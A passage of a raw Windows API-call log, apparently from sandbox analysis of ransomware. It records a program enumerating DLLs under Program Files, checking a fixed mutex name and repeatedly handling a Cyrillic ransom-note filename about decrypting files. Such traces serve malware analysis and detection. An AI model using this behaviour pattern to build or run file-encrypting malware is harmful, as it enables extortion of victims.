cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.083] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.083] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="qñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.084] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.084] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ac08, cbMultiByte=36, lpWideCharStr=0x18e0b0, cchWideChar=2047 | out: lpWideCharStr="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.txt\x06") returned 36 [0104.084] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\sqlcecompact35.dll", cchWideChar=77, lpMultiByteStr=0x18e08c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\sqlcecompact35.dll", lpUsedDefaultChar=0x0) returned 77 [0104.084] CharLowerBuffW (in: lpsz=".dll", cchLength=0x4 | out: lpsz=".dll") returned 0x4 [0104.084] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".dll", cchWideChar=4, lpMultiByteStr=0x18e0b0, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".dllmpact Edition\\v3.5\\sqlcecompact35.dll", lpUsedDefaultChar=0x0) returned 4 [0104.084] FindNextFileW (in: hFindFile=0x575030, lpFindFileData=0x18f1f0 | out: 
lpFindFileData=0x18f1f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd805600, ftCreationTime.dwHighDateTime=0x1c8d68c, ftLastAccessTime.dwLowDateTime=0x5ab6f770, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdd805600, ftLastWriteTime.dwHighDateTime=0x1c8d68c, nFileSizeHigh=0x0, nFileSizeLow=0x24440, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqlceer35EN.dll", cAlternateFileName="SQLCEE~1.DLL")) returned 1 [0104.084] FileTimeToLocalFileTime (in: lpFileTime=0x18f204, lpLocalFileTime=0x18f110 | out: lpLocalFileTime=0x18f110) returned 1 [0104.084] FileTimeToDosDateTime (in: lpFileTime=0x18f110, lpFatDate=0x18f1d2, lpFatTime=0x18f1d0 | out: lpFatDate=0x18f1d2, lpFatTime=0x18f1d0) returned 1 [0104.084] GlobalLock (hMem=0x45000c) returned 0x588000 [0104.084] GlobalHandle (pMem=0x588000) returned 0x45000c [0104.084] GlobalUnlock (hMem=0x45000c) returned 0 [0104.084] GlobalLock (hMem=0x45000c) returned 0x588000 [0104.084] GlobalLock (hMem=0x450004) returned 0x58a010 [0104.084] GlobalHandle (pMem=0x588000) returned 0x45000c [0104.085] GlobalUnlock (hMem=0x45000c) returned 0 [0104.085] GlobalHandle (pMem=0x58a010) returned 0x450004 [0104.085] GlobalUnlock (hMem=0x450004) returned 0 [0104.085] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.085] CharLowerBuffW (in: lpsz="sqlceer35EN.dll", cchLength=0xf | out: lpsz="sqlceer35en.dll") returned 0xf [0104.085] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.085] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.085] 
WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.085] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".ñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.085] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.085] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.085] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="5", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="5ñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.085] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="3", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="3ñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.085] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.085] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.085] 
WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.086] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="c", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.086] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.086] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="qñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.086] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.086] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ac78, cbMultiByte=36, lpWideCharStr=0x18e0b0, cchWideChar=2047 | out: lpWideCharStr="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.txt\x06") returned 36 [0104.086] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\sqlceer35EN.dll", cchWideChar=74, lpMultiByteStr=0x18e08c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\sqlceer35EN.dllô", lpUsedDefaultChar=0x0) returned 74 [0104.086] CharLowerBuffW (in: lpsz=".dll", cchLength=0x4 | out: lpsz=".dll") returned 0x4 [0104.086] WideCharToMultiByte (in: 
CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".dll", cchWideChar=4, lpMultiByteStr=0x18e0b0, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".dllmpact Edition\\v3.5\\sqlceer35EN.dllô", lpUsedDefaultChar=0x0) returned 4 [0104.086] FindNextFileW (in: hFindFile=0x575030, lpFindFileData=0x18f1f0 | out: lpFindFileData=0x18f1f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd805600, ftCreationTime.dwHighDateTime=0x1c8d68c, ftLastAccessTime.dwLowDateTime=0x5ab958d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdd805600, ftLastWriteTime.dwHighDateTime=0x1c8d68c, nFileSizeHigh=0x0, nFileSizeLow=0x15a40, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqlceme35.dll", cAlternateFileName="SQLCEM~1.DLL")) returned 1 [0104.086] FileTimeToLocalFileTime (in: lpFileTime=0x18f204, lpLocalFileTime=0x18f110 | out: lpLocalFileTime=0x18f110) returned 1 [0104.086] FileTimeToDosDateTime (in: lpFileTime=0x18f110, lpFatDate=0x18f1d2, lpFatTime=0x18f1d0 | out: lpFatDate=0x18f1d2, lpFatTime=0x18f1d0) returned 1 [0104.086] GlobalLock (hMem=0x450004) returned 0x588000 [0104.086] GlobalHandle (pMem=0x588000) returned 0x450004 [0104.086] GlobalUnlock (hMem=0x450004) returned 0 [0104.086] GlobalLock (hMem=0x450004) returned 0x588000 [0104.087] GlobalLock (hMem=0x45000c) returned 0x58a010 [0104.087] GlobalHandle (pMem=0x588000) returned 0x450004 [0104.087] GlobalUnlock (hMem=0x450004) returned 0 [0104.087] GlobalHandle (pMem=0x58a010) returned 0x45000c [0104.087] GlobalUnlock (hMem=0x45000c) returned 0 [0104.087] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.087] CharLowerBuffW (in: lpsz="sqlceme35.dll", cchLength=0xd | out: lpsz="sqlceme35.dll") returned 0xd [0104.087] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 
lpMultiByteStr="lñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.087] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.087] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.087] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".ñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.087] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="5", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="5ñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.087] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="3", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="3ñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.087] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.087] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="m", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.087] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 
lpMultiByteStr="eñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.088] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="c", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.088] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.088] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="qñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.088] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.088] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ac08, cbMultiByte=36, lpWideCharStr=0x18e0b0, cchWideChar=2047 | out: lpWideCharStr="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.txt\x06") returned 36 [0104.088] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\sqlceme35.dll", cchWideChar=72, lpMultiByteStr=0x18e08c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\sqlceme35.dllè", lpUsedDefaultChar=0x0) returned 72 [0104.088] CharLowerBuffW (in: lpsz=".dll", cchLength=0x4 | out: lpsz=".dll") returned 0x4 [0104.088] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".dll", cchWideChar=4, lpMultiByteStr=0x18e0b0, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".dllmpact 
Edition\\v3.5\\sqlceme35.dllè", lpUsedDefaultChar=0x0) returned 4 [0104.088] FindNextFileW (in: hFindFile=0x575030, lpFindFileData=0x18f1f0 | out: lpFindFileData=0x18f1f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd805600, ftCreationTime.dwHighDateTime=0x1c8d68c, ftLastAccessTime.dwLowDateTime=0x6d3a4910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdd805600, ftLastWriteTime.dwHighDateTime=0x1c8d68c, nFileSizeHigh=0x0, nFileSizeLow=0x3fa40, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqlceoledb35.dll", cAlternateFileName="SQLCEO~1.DLL")) returned 1 [0104.088] FileTimeToLocalFileTime (in: lpFileTime=0x18f204, lpLocalFileTime=0x18f110 | out: lpLocalFileTime=0x18f110) returned 1 [0104.088] FileTimeToDosDateTime (in: lpFileTime=0x18f110, lpFatDate=0x18f1d2, lpFatTime=0x18f1d0 | out: lpFatDate=0x18f1d2, lpFatTime=0x18f1d0) returned 1 [0104.104] GlobalLock (hMem=0x45000c) returned 0x588000 [0104.104] GlobalHandle (pMem=0x588000) returned 0x45000c [0104.104] GlobalUnlock (hMem=0x45000c) returned 0 [0104.104] GlobalLock (hMem=0x45000c) returned 0x588000 [0104.104] GlobalLock (hMem=0x450004) returned 0x58a010 [0104.104] GlobalHandle (pMem=0x588000) returned 0x45000c [0104.104] GlobalUnlock (hMem=0x45000c) returned 0 [0104.104] GlobalHandle (pMem=0x58a010) returned 0x450004 [0104.106] GlobalUnlock (hMem=0x450004) returned 0 [0104.106] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.107] CharLowerBuffW (in: lpsz="sqlceoledb35.dll", cchLength=0x10 | out: lpsz="sqlceoledb35.dll") returned 0x10 [0104.107] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.107] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18e0a8, 
cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.107] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.107] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".ñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.107] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="5", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="5ñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.107] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="3", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="3ñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.107] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="b", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.107] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.107] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.107] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18e0a8, 
cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.107] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="o", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.107] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.107] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="c", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.107] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.107] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="qñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.107] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.107] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ac78, cbMultiByte=36, lpWideCharStr=0x18e0b0, cchWideChar=2047 | out: lpWideCharStr="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.txt\x06") returned 36 [0104.107] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft SQL Server Compact 
Edition\\v3.5\\sqlceoledb35.dll", cchWideChar=75, lpMultiByteStr=0x18e08c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\sqlceoledb35.dll", lpUsedDefaultChar=0x0) returned 75 [0104.108] CharLowerBuffW (in: lpsz=".dll", cchLength=0x4 | out: lpsz=".dll") returned 0x4 [0104.108] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".dll", cchWideChar=4, lpMultiByteStr=0x18e0b0, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".dllmpact Edition\\v3.5\\sqlceoledb35.dll", lpUsedDefaultChar=0x0) returned 4 [0104.108] FindNextFileW (in: hFindFile=0x575030, lpFindFileData=0x18f1f0 | out: lpFindFileData=0x18f1f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdeb18300, ftCreationTime.dwHighDateTime=0x1c8d68c, ftLastAccessTime.dwLowDateTime=0x6d3caa70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdeb18300, ftLastWriteTime.dwHighDateTime=0x1c8d68c, nFileSizeHigh=0x0, nFileSizeLow=0x114e40, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqlceqp35.dll", cAlternateFileName="SQLCEQ~1.DLL")) returned 1 [0104.108] FileTimeToLocalFileTime (in: lpFileTime=0x18f204, lpLocalFileTime=0x18f110 | out: lpLocalFileTime=0x18f110) returned 1 [0104.108] FileTimeToDosDateTime (in: lpFileTime=0x18f110, lpFatDate=0x18f1d2, lpFatTime=0x18f1d0 | out: lpFatDate=0x18f1d2, lpFatTime=0x18f1d0) returned 1 [0104.108] GlobalLock (hMem=0x450004) returned 0x588000 [0104.108] GlobalHandle (pMem=0x588000) returned 0x450004 [0104.108] GlobalUnlock (hMem=0x450004) returned 0 [0104.108] GlobalLock (hMem=0x450004) returned 0x588000 [0104.108] GlobalLock (hMem=0x45000c) returned 0x58a010 [0104.108] GlobalHandle (pMem=0x588000) returned 0x450004 [0104.108] GlobalUnlock (hMem=0x450004) returned 0 [0104.108] GlobalHandle (pMem=0x58a010) returned 0x45000c [0104.108] GlobalUnlock (hMem=0x45000c) returned 0 [0104.108] OpenMutexA 
(dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.109] CharLowerBuffW (in: lpsz="sqlceqp35.dll", cchLength=0xd | out: lpsz="sqlceqp35.dll") returned 0xd [0104.109] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.109] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.109] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.109] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".ñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.109] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="5", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="5ñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.109] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="3", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="3ñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.109] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.109] WideCharToMultiByte (in: 
